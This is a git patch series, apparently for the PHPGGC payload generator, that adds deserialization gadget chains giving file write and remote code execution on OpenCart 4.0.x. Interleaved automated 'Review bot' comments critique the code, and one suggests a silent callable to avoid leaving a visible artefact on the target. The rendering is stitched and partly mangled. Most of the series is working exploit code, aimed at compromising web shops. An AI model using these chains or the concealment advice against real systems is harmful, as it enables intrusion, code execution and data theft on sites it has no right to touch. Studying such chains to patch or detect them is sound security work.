From 68f1afece5636f1b30e3c73ba9067e5eb3ff4d89 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Mon, 25 Nov 2024 20:30:48 +0000 Subject: [PATCH 1/7] OpenCart/FW1 --- gadgetchains/OpenCart/FW/1/chain.php | 23 ++++++++++++++++ gadgetchains/OpenCart/FW/1/gadgets.php | 38 ++++++++++++++++++++++++++ 2 files changed, 61 insertions(+) create mode 100644 gadgetchains/OpenCart/FW/1/chain.php create mode 100644 gadgetchains/OpenCart/FW/1/gadgets.php diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php new file mode 100644 index 00000000..3e43c7dd --- /dev/null +++ b/gadgetchains/OpenCart/FW/1/chain.php @@ -0,0 +1,23 @@ +connection = $connection; + } + } +} + +namespace Opencart\System\Library +{ + class Session + { + protected object $adaptor; + protected string $session_id; + + public function __construct($adaptor, $session_id) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + } + } + + class Log + { + private string $file; + + public function __construct($file) { + $this->file = $file; + } + } +} From 699ab0e5cde174d9e77bd758aab21727ff7ebb1a Mon Sep 17 00:00:00 2001 From: mcdruid Date: Sat, 7 Dec 2024 10:36:33 +0000 Subject: [PATCH 2/7] OpenCart/FW2 --- gadgetchains/OpenCart/FW/2/chain.php | 28 +++++++++++++++++ gadgetchains/OpenCart/FW/2/gadgets.php | 43 ++++++++++++++++++++++++++ 2 files changed, 71 insertions(+) create mode 100644 gadgetchains/OpenCart/FW/2/chain.php create mode 100644 gadgetchains/OpenCart/FW/2/gadgets.php diff --git a/gadgetchains/OpenCart/FW/2/chain.php b/gadgetchains/OpenCart/FW/2/chain.php new file mode 100644 index 00000000..e076fa97 --- /dev/null +++ b/gadgetchains/OpenCart/FW/2/chain.php 
@@ -0,0 +1,28 @@ +connection = $connection; + } + } +} + +namespace { + class Session + { + protected object $adaptor; + protected string $session_id; + public $data; + + public function __construct($adaptor, $session_id, $data) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + $this->data = $data; + } + } + + class Twig_Cache_Filesystem + { + // for OpenCart 3.0.3.3 or older. + } +} + +namespace Twig\Cache +{ + class FilesystemCache + { + + } +} From 7bb53b5b44a9093bc90c0d91bff3baeaa67f930b Mon Sep 17 00:00:00 2001 From: mcdruid Date: Sun, 8 Dec 2024 10:33:20 +0000 Subject: [PATCH 3/7] note about commit that will protect __destruct --- gadgetchains/OpenCart/FW/1/chain.php | 3 +++ 1 file changed, 3 insertions(+) diff --git a/gadgetchains/OpenCart/FW/1/chain.php b/gadgetchains/OpenCart/FW/1/chain.php index 3e43c7dd..994ae48a 100644 --- a/gadgetchains/OpenCart/FW/1/chain.php +++ b/gadgetchains/OpenCart/FW/1/chain.php @@ -7,6 +7,9 @@ class FW1 extends \PHPGGC\GadgetChain\FileWrite public static $version = '4.0.0.0 <= 4.0.2.3+'; public static $vector = '__destruct'; public static $author = 'mcdruid'; + public static $information = 'This will stop working when the following: + https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38 + ..is included in a release.'; public function generate(array $parameters) { From 57e90e04e95a7cb4667f9dbe6049177a0d6268c9 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Mon, 9 Dec 2024 15:49:13 +0000 Subject: [PATCH 4/7] OpenCart/RCE1 --- gadgetchains/OpenCart/RCE/1/chain.php | 26 +++++++++++++++ gadgetchains/OpenCart/RCE/1/gadgets.php | 42 +++++++++++++++++++++++++ 2 files changed, 68 insertions(+) create mode 100644 gadgetchains/OpenCart/RCE/1/chain.php create mode 100644 gadgetchains/OpenCart/RCE/1/gadgets.php diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php new file mode 100644 index 00000000..77d2fdb8 --- /dev/null 
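Review bot: The new `$information` literal in the FW1 hunk is a single-quoted string that spans three source lines, so the line breaks and the leading indentation of the continuation lines become part of the value PHPGGC prints, and it sits next to a `$version` of `'4.0.0.0 <= 4.0.2.3+'` that stays open-ended while the text predicts breakage. Collapse it to one line, e.g. `public static $information = 'Will stop working once https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38 is included in a release.';`, and state in the same string which release has actually been tested so the trailing `+` is not read as a confirmed upper bound. The `generate()` method whose signature closes the hunk continues outside it.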
+++ b/gadgetchains/OpenCart/RCE/1/chain.php @@ -0,0 +1,26 @@ +connection = $connection; + } + } +} + +namespace Opencart\System\Library +{ + class Session + { + protected object $adaptor; + protected string $session_id; + + public function __construct($adaptor, $session_id) + { + $this->adaptor = $adaptor; + $this->session_id = $session_id; + } + } +} + +namespace Opencart\System\Engine +{ + Class Proxy + { + protected $data = []; + + public function __construct($key, $function) + { + $this->data[$key] = $function; + } + } +} From ba36f3200e8bcb62c08f2373e5f398986411784c Mon Sep 17 00:00:00 2001 From: mcdruid Date: Fri, 4 Apr 2025 15:25:35 +0100 Subject: [PATCH 5/7] fix version details for RCE/1 --- gadgetchains/OpenCart/RCE/1/chain.php | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/gadgetchains/OpenCart/RCE/1/chain.php b/gadgetchains/OpenCart/RCE/1/chain.php index 77d2fdb8..2b4ff8cf 100644 --- a/gadgetchains/OpenCart/RCE/1/chain.php +++ b/gadgetchains/OpenCart/RCE/1/chain.php @@ -4,12 +4,11 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall { - public static $version = '4.0.0.0 <= 4.0.2.3+'; + public static $version = '4.0.0.0 < 4.1.0.0'; public static $vector = '__destruct'; public static $author = 'mcdruid'; - public static $information = 'This will stop working when the following: - https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38 - ..is included in a release.'; + public static $information = 'This stopped working when this commit landed: + https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38'; public function generate(array $parameters) { From bc93c89492a6f84e9df0db8ba09f30c766c713c7 Mon Sep 17 00:00:00 2001 
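Review bot: `Class Proxy` in the `Opencart\System\Engine` namespace of RCE/1/gadgets.php uses a capitalised keyword; PHP accepts it, but every other declaration in the series and PER-CS use lowercase, so write `class Proxy`. The constructor also lacks a why-comment; something like `// $key is the method name the target will invoke on the proxy, $function the callable stored under it` would explain the caller-chosen key, with the actual dispatch presumably happening in OpenCart's Proxy::__call and worth confirming there. The file header of this gadgets.php hunk is not visible in this rendering.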
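Review bot: FW/1/chain.php (patch 3 in this series) is left inconsistent with this hunk: it still advertises `'4.0.0.0 <= 4.0.2.3+'` and the "will stop working" wording while citing the same commit 087e20dd that this hunk now treats as landed. If FW1 reaches its sink through the same now-protected `__destruct`, it should receive the same two lines, `public static $version = '4.0.0.0 < 4.1.0.0';` and `public static $information = 'This stopped working when this commit landed: https://github.com/opencart/opencart/commit/087e20dd1cd9b441be5a327fd4b6698744bffb38';`. Keeping that literal on one line also avoids the embedded newline and indentation that the two-line form here carries into PHPGGC's output. The `generate()` method that closes the hunk continues outside it.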
From: mcdruid Date: Fri, 4 Apr 2025 16:10:13 +0100 Subject: [PATCH 6/7] OpenCart/RCE2 --- gadgetchains/OpenCart/RCE/2/chain.php | 25 ++++++++++++++ gadgetchains/OpenCart/RCE/2/gadgets.php | 45 +++++++++++++++++++++++++ 2 files changed, 70 insertions(+) create mode 100644 gadgetchains/OpenCart/RCE/2/chain.php create mode 100644 gadgetchains/OpenCart/RCE/2/gadgets.php diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php new file mode 100644 index 00000000..22c4750c --- /dev/null +++ b/gadgetchains/OpenCart/RCE/2/chain.php @@ -0,0 +1,25 @@ +data[$key] = $function; + // It's not essential to define a callback for 'execute' but doing + // so delays hitting errors for few more function calls. Using + // print_r here may mean you see the return value of the payload. + $this->data['execute'] = 'print_r'; + } + } +} + + +namespace GuzzleHttp\Handler { + class CurlFactory { + private $handles = []; + + public function __construct($handle) { + $this->handles = $handle; + } + } +} + +namespace Aws { + class ResultPaginator { + private $client; + private $config; + private $operation; + private $args = []; + + public function __construct($client, $operation) { + $this->config['output_token'] = 'foo'; + $this->client = $client; + $this->operation = $operation; + } + } + +} From 625b553fc9d3ac79493b3bc868c47149348bf445 Mon Sep 17 00:00:00 2001 From: mcdruid Date: Sun, 6 Apr 2025 17:03:34 +0100 Subject: [PATCH 7/7] indentation fixes, plus make payload tiny bit smaller --- gadgetchains/OpenCart/RCE/2/chain.php | 6 +++--- gadgetchains/OpenCart/RCE/2/gadgets.php | 4 ++-- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/gadgetchains/OpenCart/RCE/2/chain.php b/gadgetchains/OpenCart/RCE/2/chain.php index 22c4750c..65240fc5 100644 --- a/gadgetchains/OpenCart/RCE/2/chain.php +++ b/gadgetchains/OpenCart/RCE/2/chain.php 
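Review bot: The hard-coded `$this->data['execute'] = 'print_r'` in RCE/2's Proxy gadget means, per the accompanying comment, that the payload's return value is echoed straight into the target's HTTP response; that is handy in a lab but is exactly the visible artefact an operator may not want, and the comment explains the mechanics without naming that trade-off. Add it, e.g. `// print_r echoes the payload's return value into the response; use a silent callable if output is unwanted.`, or expose the callback as a chain parameter rather than fixing it here. Minor: `for few more function calls` should read `for a few more function calls`. The file header of this gadgets.php hunk is not visible in this rendering, so the class declaration above `$data` could not be checked.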
@@ -16,9 +16,9 @@ public function generate(array $parameters) $parameter = $parameters['parameter']; return new \GuzzleHttp\Handler\CurlFactory( - new \Aws\ResultPaginator( - new \Opencart\System\Engine\Proxy('getCommand', $function), - $parameter + new \Aws\ResultPaginator( + new \Opencart\System\Engine\Proxy('getCommand', $function), + $parameter ), ); } diff --git a/gadgetchains/OpenCart/RCE/2/gadgets.php b/gadgetchains/OpenCart/RCE/2/gadgets.php index 0b86f9b3..d4f3b772 100644 --- a/gadgetchains/OpenCart/RCE/2/gadgets.php +++ b/gadgetchains/OpenCart/RCE/2/gadgets.php @@ -23,7 +23,7 @@ class CurlFactory { private $handles = []; public function __construct($handle) { - $this->handles = $handle; + $this->handles = $handle; } } } @@ -36,7 +36,7 @@ class ResultPaginator { private $args = []; public function __construct($client, $operation) { - $this->config['output_token'] = 'foo'; + $this->config['output_token'] = false; $this->client = $client; $this->operation = $operation; }
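Review bot: `$this->config['output_token'] = false;` in `ResultPaginator::__construct` now carries a value whose only stated rationale (the commit title) is a shorter serialized payload, but nothing beside it says why the key must exist at all, so a later cleanup could drop the line and silently break the chain. Add a why-comment, e.g. `// Key must be present; the value appears irrelevant and false keeps the payload short — TODO confirm against Aws\ResultPaginator`. The surrounding `private $args = [];` and the `$client`/`$operation` assignments are unchanged context, and the class declaration sits above the hunk.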